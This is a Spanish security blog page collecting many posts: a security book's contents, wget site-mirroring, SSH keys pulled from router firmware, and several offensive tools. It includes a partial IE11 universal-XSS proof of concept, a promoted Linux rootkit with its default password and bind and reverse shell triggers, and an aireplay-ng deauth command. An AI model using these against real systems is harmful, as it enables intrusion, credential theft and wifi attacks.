Libro: Detectando malicia (Detecting Malice, Fraud Loss Prevention eBook)

Cada día se cometen fraudes en sitios web y este libro ayuda a detectar si algo oscuro está ocurriendo en el tuyo...

Detectando Malicia, en inglés Detecting Malice, es un libro escrito por Robert "RSnake" Hansen ( para ayudar a los administradores web, los desarrolladores, el personal de operaciones y los managers de productos de seguridad en la construcción y el mantenimiento de un estado de seguridad elevado.

La comprensión de la intención del usuario es la clave para reducir los ratios de fraude en las aplicaciones web modernas. Desde pymes al gobierno, este libro abarca muchos ámbitos diferentes de fraude y cómo detectarlo en muchas capas diferentes.

Desde DNS y TCP al contenido embebido y el fingerprinting del navegador se utilizan para identificar a los usuarios que tienen más probabilidades de llegar a ser peligrosos antes de que el ataque suceda. Una gran cantidad de técnicas y ejemplos están disponibles en las más de 300 páginas de este interesante libro.

Tabla de contenidos:
 Detecting Malice: Preface
    User Disposition
    Deducing Without Knowing
    Book Overview
    Who Should Read This Book?
    Why Now?
    A Note on Style
    Working Without a Silver Bullet
    Special Thanks
  Chapter 1 - DNS and TCP: The Foundations of Application Security
    In the Beginning Was DNS
    Same-Origin Policy and DNS Rebinding
    DNS Zone Transfers and Updates
    DNS Enumeration
    Spoofing and the Three-Way Handshake
    Passive OS Fingerprinting with pOf
    TCP Timing Analysis
    Network DoS and DDoS Attacks
    Attacks Against DNS
    TCP DoS
    Low Bandwidth DoS
    Using DoS As Self-Defense
    Motives for DoS Attacks
    DoS Conspiracies
    Port Scanning
    With That Out of the Way...
  Chapter 2 - IP Address Forensics
    What Can an IP Address Tell You?
    Reverse DNS Resolution
    WHOIS Database
    Real-Time Block Lists and IP Address Reputation
    Related IP Addresses
    When IP Address Is A Server
    Web Servers as Clients
    Dealing with Virtual Hosts
    Proxies and Their Impact on IP Address Forensics
    Network-Level Proxies
    HTTP Proxies
    AOL Proxies
    Anonymization Services
    Tor Onion Routing
    Obscure Ways to Hide IP Address
    IP Address Forensics
    To Block or Not?
  Chapter 3 - Time
    Traffic Patterns
    Event Correlation
    Daylight Savings
    Forensics and Time Synchronization
    Humans and Physical Limitations
    Gold Farming
    CAPTCHA Breaking
    Holidays and Prime Time
    Risk Mitigation Using Time Locks
    The Future is a Fog
  Chapter 4 - Request Methods and HTTP Protocols
    Request Methods
    PUT and DELETE
    Invalid Request Methods
    Random Binary Request Methods
    Lowercase Method Names
    Extraneous White Space on the Request Line
    HTTP Protocols
    Missing Protocol Information
    HTTP 1.0 vs. HTTP 1.1
    Invalid Protocols and Version Numbers
    Newlines and Carriage Returns
  Chapter 5 - Referring URL
    Referer Header
    Information Leakage through Referer
    Disclosing Too Much
    Spot the Phony Referring URL
    Third-Party Content Referring URL Disclosure
    What Lurks in Your Logs
    Referer and Search Engines
    Language, Location, and the Politics That Comes With It
    Google Dorks
    Natural Search Strings
    Vanity Search
    Black Hat Search Engine Marketing and Optimization
    Referring URL Availability
    Direct Page Access
    Meta Refresh
    Links from SSL/TLS Sites
    Links from Local Pages
    Users' Privacy Concerns
    Determining Why Referer Isn't There
    Referer Reliability
    Impact of Cross-Site Request Forgery
    Is the Referring URL a Fake?
    Referral Spam
    Last thoughts
  Chapter 6 - Request URL
    What Does A Typical HTTP Request Look Like?
    Watching For Things That Don’t Belong
    Domain Name in the Request Field
    Proxy Access Attempts
    Anchor Identifiers
    Common Request URL Attacks
    Remote File Inclusion
    SQL Injection
    HTTP Response Splitting
    NUL Byte Injection
    Pipes and System Command Execution
    Cross-Site Scripting
    Web Server Fingerprinting
    Invalid URL Encoding
    Well-Known Server Files
    Easter Eggs
    Admin Directories
    Automated Application Discovery
    Well-Known Files
    Google Sitemaps
  Chapter 7 - User-Agent Identification
    What is in a User-Agent Header?
    Malware and Plugin Indicators
    Software Versions and Patch Levels
    User-Agent Spoofing
    Cross Checking User-Agent against Other Headers
    User-Agent Spam
    Indirect Access Services
    Google Translate
    Traces of Application Security Tools
    Common User-Agent Attacks
    Search Engine Impersonation
  Chapter 8 - Request Header Anomalies
    Requests Missing Host Header
    Mixed-Case Hostnames in Host and Referring URL Headers
    Cookie Abuse
    Cookie Fingerprinting
    Cross Site Cooking
    Assorted Request Header Anomalies
    Expect Header XSS
    Headers Sent by Application Vulnerability Scanners
    Cache Control Headers
    Accept CSRF Deterrent
    Language and Character Set Headers
    Dash Dash Dash
    From Robot Identification
    Content-Type Mistakes
    Common Mobile Phone Request Headers
    X-Moz Prefetching
  Chapter 9 - Embedded Content
    Embedded Styles
    Detecting Robots
    Detecting CSRF Attacks
    Embedded JavaScript
    Embedded Objects
    Request Order
    Cookie Stuffing
    Impact of Content Delivery Networks on Security
    Asset File Name Versioning
  Chapter 10 - Attacks Against Site Functionality
    Attacks Against Sign-In
    Brute-Force Attacks Against Sign-In
    Phishing Attacks
    Username Choice
    Brute Force Attacks Against Registration
    Account Pharming
    What to Learn from the Registration Data
    Fun With Passwords
    Forgot Password
    Password DoS Attacks
    Don’t Show Anyone Their Passwords
    User to User Communication
  Chapter 11 - History
    Our Past
    History Repeats Itself
    JavaScript Database
    Internet Explorer Persistence
    Flash Cookies
    CSS History
    Same Page, Same IP, Different Headers
    Cache and Translation Services
    DNS Pinning Part Two
    Breakout Fraud
  Chapter 12 - Denial of Service
    What Are Denial Of Service Attacks?
    Distributed DoS Attacks
    My First Denial of Service Lesson
    Request Flooding
    Identifying Reaction Strategies
    Database DoS
    Targeting Search Facilities
    Unusual DoS Vectors
    Banner Advertising DoS
    Chargeback DoS
    The Great Firewall of China
    Email Blacklisting
    Dealing With Denial Of Service Attacks
  Chapter 13 - Rate of Movement
    Timing Differences
    Click Fraud
    Warhol or Flash Worm
    Samy Worm
    Inverse Waterfall
    Pornography Duration
  Chapter 14 - Ports, Services, APIs, Protocols and 3rd Parties
    Ports, Services, APIs, Protocols, 3rd Parties, oh my…
    SSL and Man in the middle Attacks
    SSL/TLS Abuse
    Webmail Compromise
    Third Party APIs and Web Services
    2nd Factor Authentication and Federation
    Other Ports and Services
  Chapter 15 - Browser Sniffing
    Browser Detection
    Black Dragon, Master Reconnaissance Tool and BeEF
    Java Internal IP Address
    MIME Encoding and MIME Sniffing
    Windows Media Player “Super Cookie”
    Virtual Machines, Machine Fingerprinting and Applications
    Monkey See Browser Fingerprinting Software – Monkey Do Malware
    Malware and Machine Fingerprinting Value
    Unmasking Anonymous Users
    Java Sockets
    De-cloaking Techniques
    Persistence, Cookies and Flash Cookies Redux
    Additional Browser Fingerprinting Techniques
  Chapter 16 - Uploaded Content
    Image Watermarking
    Image Steganography
    EXIF Data In Images
    GDI+ Exploit
    Child Pornography
    Copyrights and Nefarious Imagery
    Sharm el Sheikh Case Study
    Text Stenography
    Blog and Comment Spam
    Power of the Herd
    Profane Language
    Localization and Internationalization
  Chapter 17 - Loss Prevention
    Lessons From The Offline World
    Subliminal Imagery
    Security Badges
    Prevention Through Fuzzy Matching
    Manual Fraud Analysis
  Chapter 18 - Wrapup
    Mood Ring
    Blocking and the 4th Wall Problem
    Booby Trapping Your Application
    Heuristics Age
    Know Thy Enemy
    Race, Sex, Religion
    Ethnographic Landscape
    Calculated Risks
    Correlation and Causality
  About Robert Hansen
Web del libro:

Clonar un portal Moodle (y más) en dos patadas con wget

Andaba yo viendo una manera efectiva y rápida para clonar un sitio web, buscando la mejor herramienta tipo Teleport Pro o HTTrack, cuando un compi me comentó que wget es bastante potable incluso para spidering/crawling. Y tanto que sí. Basta echar un vistazo al manual de la herramienta para darse cuenta de que wget no sólo vale para descargar un simple fichero, si no que tiene muchísimas opciones y parámetros que se pueden adaptar según el sitio web que quieras duplicar.

Sirva de ejemplo el de esta entrada con el que es posible crear un mirror de cualquier portal que use Moodle, ya sabéis, un sistema de gestión de cursos de formación. Imaginaros lo rápido que obtendríamos una copia de un curso en concreto que nos interesara para poder consultarlo offline cuando nos vamos de viaje...

Primero obtenemos la cookie ya que, evidentemente, la autenticación en Moodle se realiza mediante un formulario de login:

wget --load-cookies my-cookies.txt \
--save-cookies=my-cookies.txt --keep-session-cookies

Luego, con dicha cookie, comenzamos con el mirror mediante los siguientes parámetros:

wget --load-cookies my-cookies.txt --keep-session-cookies --save-cookies my-cookies.txt\
--referer= -m -E -k
--reject logout*,*cal_m*,*cal_y*,post.php*,*subscribe*,help.php*,enrol.php*
-m: activa el mirroring. Es equivalente a ‘-r -N -l inf –no-remove-listing’
-E: si un fichero de tipo ‘application/xhtml+xml’ o ‘text/html’ es descargado y la URL no termina con la regexp ‘\.[Hh][Tt][Mm][Ll]?’, esta opción pondrá el sufijo ‘.html’
-k: después de que la descarga se complete, convierte los enlaces para hacerlos accesibles de forma local.
--exclude-directories: directorios que el crawler saltará.
--reject: indica los ficheros que wget no salvará al disco

Y básicamente esto sería lo suficiente para empezar y hacer un mirror de un portal Moodle. Luego podríamos hacer menos "ruido" modificando el user-agent, usando un proxy (Tor!), añadiendo pausas entre descargas, etc. Así que toca empezar a cocinar algunas pruebecillas:

wget -r -l 0 -U Mozilla -t 1 -nd -D -A jpg,jpeg,gif,png "" -e robots=off

11 formas de seguir tus movimientos a través del navegador web

Hay distintas formas de rastrear a los usuarios cuando acceden a un sitio web en particular. Algunas de ellas son más "siniestras" que otras. La mayoría de las aplicaciones web requieren algún tipo de seguimiento de sesión para mantener el estado del usuario. Esto normalmente se realiza fácilmente utilizando cookies bien configuradas (aunque esto no entra dentro del alcance de esta entrada). Una sesión está destinada a ser efímera y no persistirá por mucho tiempo.

Por otro lado, algunos métodos intentan realizar el seguimiento del usuario durante un largo tiempo, y, en particular, intentan hacer que sea difícil evadir el seguimiento. Esto se hace a veces para fines publicitarios, pero también se puede hacer para detener ciertos ataques como ataques de fuerza bruta o para identificar atacantes que vuelven a un sitio. En el peor de los casos, desde una perspectiva privada, el seguimiento se realiza para seguir un individuo a través de distintos sitios web.

Con los años, los navegadores y plugins han proporcionado un número de maneras de limitar este seguimiento. Estas son algunas de las técnicas más comunes de cómo se hace el seguimiento y la forma en que el usuario puede evitar (algunos):

1 - Cookies

Las cookies tienen el propósito de mantener el estado entre diferentes peticiones. Un navegador enviará una cookie con cada solicitud, una vez que se establece para un sitio en particular. Desde el punto de vista de la privacidad, la fecha de caducidad y el dominio de la cookie son los ajustes más importantes. La mayoría de los navegadores rechazan las cookies de cuentas de un sitio diferente, a menos que el usuario permita que estas cookies se establezcan. Una cookie de sesión correcta no debe usar fecha de caducidad, ya que debe expirar tan pronto como se cierra el navegador. La mayoría de navegadores permiten revisar, controlar y eliminar las cookies. En el pasado, se propuso una cabecera "Cookie2" para las cookies de sesión, pero esta cabecera se desaprobó y el navegador dejó de soportarlo.

Recupera todas tus contraseñas en local con LaZagne

El proyecto LaZagne de Alessandro Zanni tiene como objetivo desarrollar una herramienta de código abierto capaz de recuperar un montón de contraseñas almacenadas en el equipo de forma local. Cada software almacena sus contraseñas utilizando diferentes técnicas (texto plano, utilizando apis, algoritmos personalizados, etc.). Esta herramienta ha sido desarrollada para encontrar las contraseñas de los programas más comunes y, por el momento, es compatible con 22 aplicaciones de Windows y 12 de Linux:

Su uso es muy sencillo, simplemente ejecutamos laZagne.exe con el parámetro correspondiente: {all, browsers, chats, mails, adminsys, database, svn, wifi, windows}:

Para más información visita la página del proyecto:

Cómo dumpear las claves SSH desde el firmware de un router

Algunos me preguntáis como sacar las claves ssh de los routers en referencia a la entrada de anoche. Os veo venir... pero bueno, veremos rápidamente como hacerlo extrayendo la imagen del firmware de un router ;)

En esta ocasión sin embargo vamos a dejar al *pobre* Comtrend VG-8050 y vamos a ir a por el D-Link Dsl-2750u (la belleza de la derecha). En concreto vamos a echar un vistazo a una de las versiones de firmware que también viene con un demonio Dropbear 0.46 con "premio": la ME_1.11 de octubre de 2013:

Después de descargar los menos de 7mb que ocupa el rar, lo descomprimimos y analizamos la imagen con Binwalk, el estándar de facto para el análisis de firmwares:

root@kali:~/firmwares# file GAN9.9T113A-B-DL-DSL2750U-R5B0024-Dubai.EN_2T2R_text_for_lan_update.img 
GAN9.9T113A-B-DL-DSL2750U-R5B0024-Dubai.EN_2T2R_text_for_lan_update.img: data

root@kali:~/firmwares# binwalk GAN9.9T113A-B-DL-DSL2750U-R5B0024-Dubai.EN_2T2R_text_for_lan_update.img 

0             0x0             LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5402908 bytes
1722624       0x1A4900        Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 5080877 bytes,  1142 inodes, blocksize: 262144 bytes, created: Thu Oct 24 07:46:30 2013

Casi 250.000 routers de Telefónica en España son vulnerables porque tienen las mismas claves SSH

Hoy en el blog de Shodan leía una interesante entrada de John Matherly en el que, mediante el siguiente script, observaba que en Internet existen numerosos fingerprints SSH duplicados:
import shodan

api = shodan.Shodan(YOUR_API_KEY)

# Get the top 1,000 duplicated SSH fingerprints
results = api.count('port:22', facets=[('ssh.fingerprint', 1000)])

for facet in results['facets']['ssh.fingerprint']:
    print '%s --> %s' % (facet['value'], facet['count'])

Realmente esto no es nada nuevo ya que desde hace unos cuantos años se sabe que algunos fabricantes comenten el error de no borrar las claves SSH antes de salvar (y luego distribuir) la imagen de los firmwares de sus dispositivos embebidos, que luego no regeneran las claves en el primer boot. Incluso hay proyectos que recopilan las claves duplicadas:

Pero lo sorprendente es que hay un fingerprint que se repite en un país y con un proveedor en gran número con respecto al resto:

Se trata de España y de Telefónica que distribuye casi 250.000 routers para fibras domésticas o FFTH modelo Comtrend VG-8050 con un firmware que contiene un servidor SSH ligero (dropbear 0.46) con las mismas claves ssh:

Key type: ssh-rsa
Fingerprint: dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Esto significa que hay casi 250.000 usuarios en España que son vulnerables. Muchos de ellos corren por defecto ssh con las credenciales también por defecto 1234/1234 (estos directamente están jodidos vendidos) y todos ellos son susceptibles a ataques MiTM en el que cualquiera podría descifrar sus comunicaciones.

El firmware vulnerable es (al menos) el SB01-S412TLF-C07_R03 de 2014 y, que yo sepa, la última versión es la C08_R08. Así que si eres usuario de Telefónica pregunten a su soporte Movistar y ¡actualicen!

Ejercicios para aprender ingeniería inversa y exploiting

El francés Wannes Rombouts aka @wapiflapi tiene un proyecto en GitHub con un montón de ejercicios diseñados para solucionarse con NX + ASLR sin depender de que libc se utiliza. La idea es que sólo debe interactuar con stdin/stdout como si fuera un servicio remoto, argv y env no son necesarios para la explotación. Ya tenemos diversión para no dormir en unas cuantas noches:

pd. Premio para cualquier amante del reversing que publique en el blog el writeup de uno de los ejercicios ;)

Pescando WPA2 con Linset

Atacar redes wireless se ha convertido desde hace tiempo en un deporte, una diversión o un hobby.

Y cuando digo deporte, diversión o hobby es literal el uso que quiero dar a esta frase: hay "gente despreciable" a los que cuando se les acaban los temas de conversación incluso se juegan las cañas a ver quien es el primero en fundir la "seguridad" de un AP en menos tiempo.

En una de estas competiciones absurdas, fue sorprendente la rapidez (con bastante churro...) con la que unos de estos "borrachos despreciables" se hizo con el premio gordo.

La curiosidad me embargó y, como curioso soy un rato, me abalancé a su portátil..

Es aquí donde conocí la herramienta que os presento hoy:

El concepto no es nada nuevo, ya conocíamos que este vector de ataque existía, lo que realmente me sorprendió (aparte de lo bien pensada y realizada la aplicación) es su efectividad,  realmente me resultó extraño, la candidez de muchos usuarios. 

Para el que no conozca el script lo puede bajar y echar un vistazo desde:

Busca exploits desde la línea de comandos con Pompem

Pompem es una herramienta de código abierto, diseñada para automatizar la búsqueda de exploits en las principales bases de datos. 

Desarrollado en Python, tiene un sistema de búsqueda avanzada, facilitando así el trabajo de pentesters y hackers éticos. En su versión actual, realiza búsquedas en bases de datos: Exploit-db, 1337day, Packetstorm Security...

También existe una versión web de Pompem (sintaxis PHP): WebPompem


Pompem funciona con cualquier versión de Python '2.6.x' y '2.7.x'. Para instalarlo crearemos un entorno de Python aislado en una distribución Kali e instalaremos las dependencias necesarias:

root@kali:~# pip install virtualenv

I evento gratuito de OWASP Madrid

OWASP Madrid Chapter arranca su andadura. Lo hace con una jornada de conferencias abierta que tendrá lugar el próximo 26 de marzo a las 18:30 en el Campus de Leganés de la UC3M.

La entrada es GRATUITA, pero el aforo es limitado por lo que será necesario inscribirse al evento y llevar impresa la entrada. Date prisa porque ya quedan menos de 100 plazas!:  

Los detalles de la agenda son los siguientes:
  • Presentación OWASP Madrid
  • From vulnerable source to shell in two hours (La charla estará comprendida de dos partes)
    • Introducción a la seguridad en código por Ángel García Moreno @_Ell0_: Se explicarán conceptos de seguridad en código, enseñando fallos comunes, y también se mostrarán ejemplos prácticos. En concreto se utilizará un fallo conocido de Drupal, framework de PHP famoso por su seguridad.
    • Explotación de un fallo de seguridad por Daniel Martínez @dan1t0: En esta charla que continuará donde termine la anterior se explotará el fallo mostrado por Ángel, dumpeando información de la BBDD, troyanizando y controlando el servidor remoto. Se mostrará como poder usar este fallo para atacar a otros usuarios.

JASBUG! es el momento de actualizar todos los equipos de una red con Directorio Activo

En el pasado, la seguridad de la red se diseñó en torno a "mantener el interior seguro desde el exterior", en lugar de la idea más general "proteger cada ordenador de todos los demás". En estos días la defensa de la red como un perímetro definido rígidamente no es lo suficientemente buena, ya que muchos atacantes vienen de dentro.

JASBUG, bautizado así porque fue descubierto (y reportado hace meses) por la firma de seguridad JAS Global Advisors, es más que un bug un fallo de diseño remanente desde desde Windows Server 2003 que puede permitir la ejecución remota de código (RCE) suplantando los ficheros que el servidor envía a un cliente: software de confianza por malware. 

Este martes Microsoft ha publicado correcciones del core de su sistema para solventar estas vulnerabilidades críticas (CVE-2015-0008), concretamente dos que implican directivas de grupo y objetos de directiva de grupo (GPO):

MS15-014 - Una vulnerabilidad en SMB

Al iniciar sesión en una red con Directorio Activo, el servidor le enviará las actualizaciones según su directiva de grupo, por lo que el administrador de sistemas tiene la oportunidad de establecer una configuración estandarizada y segura en cada PC de su red. Sin embargo cuando la actualización falla, existe un fallo en SMB mediante el cual es posible desactivar los requisitos de firmado SMB, por lo que el cliente no comprobará que ya no está recibiendo los ficheros del servidor y un atacante podrá modificar la tabla ARP del switch para que acceda a su equipo y obtenga un fichero malicioso, todo esto sin que la víctima se percate.

Detectar el uso de Mimikatz en la red ("Honey Hash Tokens")

La opción /netonly del comando runas se utiliza para lanzar un programa como un usuario que existe en una máquina remota. El sistema acepta el nombre y la contraseña para ese usuario remoto y crea un token de autenticación en la memoria de su proceso LSASS sin ninguna interacción con el host remoto.

¿Qué pasa si ejecutamos el siguiente comando en nuestro equipo Windows?

runas /\administrator /netonly cmd.exe
El comando que se ejecuta en realidad no tiene ningún acceso elevado en la máquina y la contraseña no es válida, evidentemente no es una amenaza para Microsoft. Windows no intenta autenticarse en el dominio para iniciar el proceso. Asume que las credenciales son correctas, calcula el hash y lo almacena en la memoria para su uso futuro.

Más adelante, si se intenta acceder a un recurso en ese dominio, automáticamente se "pasará el HASH" al sistema remoto para entrar. Pero hasta que se intente acceder al host remoto, las contraseñas se quedan almacenadas en memoria.

¿Cómo de hackeable eres? Calcula tu puntuación 'Pwned'

Curioso artículo en el Huffington Post en el que se presenta un pequeño cuestionario con el que los usuarios pueden evaluar el riesgo de ser hackeados. Lo hemos adaptado un poquito pero más o menos puedes obtener una puntuación (no excesivamente científica) para ver las posibilidades de ser jodido pwned :

1.- ¿Qué tan fuertes son sus contraseñas? (10 puntos): A menudo las personas cometen errores básicos con sus contraseñas, como elegir aquellas que son fácilmente adivinables/crackeables (por ej: 'password123'), mantener las contraseñas por defecto, la reutilización de la misma contraseña en varias cuentas, etc. Puntuate a ti mismo:
+2 si escribes contraseñas complejas (caracteres, combinación de letras, números y símbolos)
+4 si utilizas contraseñas únicas para cada cuenta
+4 si usas autenticación de dos factores (cuando esté disponible)

2.- ¿Haces copia de seguridad de tus datos? (10 puntos): Los ciberdelincuentes usan cada vez más "ransomware" para victimizar a los consumidores. Dado que estos ataques hacen que los archivos personales (documentos, fotos, vídeos, música, etc.) sean inaccesibles y los PCs inservibles, la mejor manera de protegerse contra ello es mediante copias de seguridad periódicas de los datos a un disco duro externo, unidad flash o una cuenta en la nube. Elige una de estas puntuaciones:
+10 si haces copias de seguridad de los datos al menos una vez a la semana
+5 si haces copias de seguridad de los datos al menos una vez al mes
+1 si haces copias de seguridad con otra periodicidad mayor
+0 si no haces copias de seguridad

La verdadera cara del hacking (literalmente hablando)

Los hackers tienden a ser anónimos, sin rostro, sin nombre... pero ¿qué aspecto tendría la cara de un hacker si mezcláramos las fotos de los hackers más notorios del momento?.

Eso es lo que se preguntaba la gente de Secure Thoughts, un sitio web dedicado a la ciberseguridad y a la privacidad en Internet, que han compilado y combinado hasta 50 caras de hackers llegando a este resultado:

En ese GIF se combinan rostros como los de Barrett Brown, un portavoz de Anonymous que fue condenado recientemente a más de cinco años de prisión por el robo de datos de la firma de inteligencia Stratfor, y Gary McKinnon, quien, en 2002, fue acusado de la mayor brecha a sistemas militares de todos los tiempos.

También se incluye: Robert Tappan Morris, acreditado con la creación del primer gusano informático, y, sí, también está Héctor Monsegur alias Sabu, que colaboró con el FBI para reducir su condena ¿os suena de la película "Blackhat"?...

Ah!, y Secure Thoughts no se ha olvidado de los rostros femeninos. Este sería también el resultado:

Convierten un cuadricóptero casero en un Halcón Milenario

En, un foro de referencia para aficionados al radio control, el francés Olivier C ha creado un curioso skin para su cuadricóptero 'Prophecy 335' que lo transforma en un auténtico "clon" del Halcón Milenario... 

Cuatro rotores a 335mm, un poco de fibra de carbono, poliestireno, una tira led para simular el propulsor y un resultado increíble...  Sólo mira el siguiente vídeo:

¿Te gustaría volar uno? Pues visita el foro donde encontrarás todo el detalle de su construcción y háztelo tu mismo (DIY):

Prophecy 335:
Millenium Falcon 335:

XSS universal en la última versión versión de Internet Explorer 11.0.15

La última versión estable de Internet Explorer, la 11.0.15, puede permitir a un atacante inyectar código y robar los datos de otras páginas que el usuario tiene abiertas en otras pestañas o ventanas. Se trata de un Cross Site Scripting universal o UXSS que evade totalmente la Política del Mismo Origen o Same Origin Policy (SOP), es decir, da igual que una web tenga o no vulnerabilidades XSS, sólo por usar la última versión del navegador de Microsoft el usuario está expuesto a que le roben los datos de su sesión en cualquier otro dominio, incluso HTTP a HTTPS.

Existe una PoC en la que se demuestra como es posible inyectar código en el Daily Mail a través de otro dominio distinto:

<iframe style="display:none;" width=300 height=300 id=i name=i src="1.php"></iframe><br>
<iframe width=300 height=100 frameBorder=0 src=""></iframe><br>
function go()
  w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()\\';'))",1);

Por el momento Microsoft no ha publicado un parche para solucionar esta vulnerabilidad. Estamos probando distintas mitigaciones y analizando el bug (en versiones anteriores la PoC no funciona) pero por el momento aconsejamos usar otros navegadores. 

pd. M$ tiene deberes con Spartan, que sustituirá definitivamente a Internet Explorer en Windows 10.

xingyiquan: un sencillo pero efectivo rootkit para Linux

xingyiquan es un sencillo rootkit para Linux con kernels 3.x y 2.6.x.


– escalado de privilegios
Este rootkit tiene una utilidad llamada xingyi_rootshell que, una vez que el rootkit ha sido instalado, permite obtener un rootshell escribiendo:  ./xingyi_rootshell “sw0rdm4n”.

La cadena “sw0rdm4n” es la contraseña por defecto y la puedes encontrar en el fichero de configuración de usuario:

– bind shell
Este rootkit viene con un bind shell sobre el puerto 7777 usando la contraseña por defecto: “sw0rdm4n”.  Igual que antes, puedes encontrar el string en xingyi_userspace_src/xingyi_userspace_config.h

– reverse shell
Este rootkit tiene la funcionalidad de shell inverso que puede ser activado mediante un hook de netfilter. Para que se conecte a tu IP a través del puerto 7777 tienes que "dispararlo"  previamente haciendo telnet al puerto 1337 de la máquina con el rootkit. Antes de hacerlo asegúrate de tener escuchando un netcat en el puerto 7777.

– otras funciones normales
ocultar ficheros y directorios, ocultar conexiones, ocultar módulos, hook de procesos kill, abrir hooks, etc.


Desarrollado por Sw0rdm4n (@sw0rdm4n)
Official Website :

Herramientas pasivas y activas para encontrar SSIDs ocultos

Por defecto, los puntos de acceso retransmiten su SSID (service set identifier) o nombre de red en beacon frames aunque, hoy en día, la mayoría también permite ocultarlo: es lo que se denomina 'network cloaking' y no debe llevarnos a una sensación de falsa seguridad. Me explico, siempre está bien ocultar nuestro SSID de miradas indiscretas pero cualquier sniffer inalámbrico seguirá siendo capaz de leer los frames cuando un cliente se conecte... ¿por qué? porque el SSID va en texto claro y bastaría con leer los paquetes 'Probe Request' y 'Probe Response' (tipo=0x00, subtipo=0x05).

Y ahora seguro que dirás... "pues puedo eternizarme esperando a que un cliente se conecte al SSID objetivo"... no necesariamente. Existe un método más rápido (aunque más detectable) enviando frames de desautenticación a todos los clientes para forzarles a desconectarse y reconectarse, revelando así sus SSIDs.

Por ejemplo con aireplay-ng sería así de sencillo:

 aireplay-ng --deauth 5 -a 00:14:6C:7E:40:80 mon0